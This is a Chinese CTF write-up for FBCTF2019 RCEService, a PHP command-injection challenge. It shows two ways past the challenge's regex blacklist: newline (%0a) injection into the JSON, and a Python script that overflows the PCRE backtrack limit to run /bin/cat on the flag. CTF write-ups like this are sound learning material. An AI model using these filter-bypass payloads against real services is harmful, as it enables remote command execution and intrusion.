[FBCTF2019]RCEService

一个JSON语句的注入,
因为在框里注入会被url编码。
所以采用在url里面直接写注入。
JSON注入格式

{"cmd":"payload"}

这里面过滤了很多东西。

elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) {
    echo 'Hacking attempt detected<br/><br/>';

第一种方法

考虑用换行符来绕过。
{%0a"cmd":"payload"%0a}
就可以绕过了。
路径很混乱。
使用了/bin/下的cat方法才能拿到flag.
直接cat路径不是很成功。
据说可以find.
可能是我命令出现问题了2333

第二种方法

其实是pcre回溯次数限制绕过,参考p牛文章:
https://www.leavesongs.com/PENETRATION/use-pcre-backtrack-limit-to-bypass-restrict.html
大致意思是正则回溯最大只有1000000,如果回溯次数超过就会返回flase,构造1000000个a,使回溯超过限制就会绕过正则匹配,限制次数在php.ini的pcre.backtrack_limit有,而不造成这个漏洞的方法就是使用强比较===
文章写的很详细了

payload:
import requests
payload = '{"cmd":"/bin/cat /home/rceservice/flag","zz":"' + "a"*(1000000) + '"}'
res = requests.post("http://af72594c-dbfc-4ef9-baa3-0738dbb5fdb9.node3.buuoj.cn/", data={"cmd":payload})
#print(payload)
print(res.text)

来自师傅博客:

https://blog.csdn.net/chasingin/article/details/104398092

推荐文章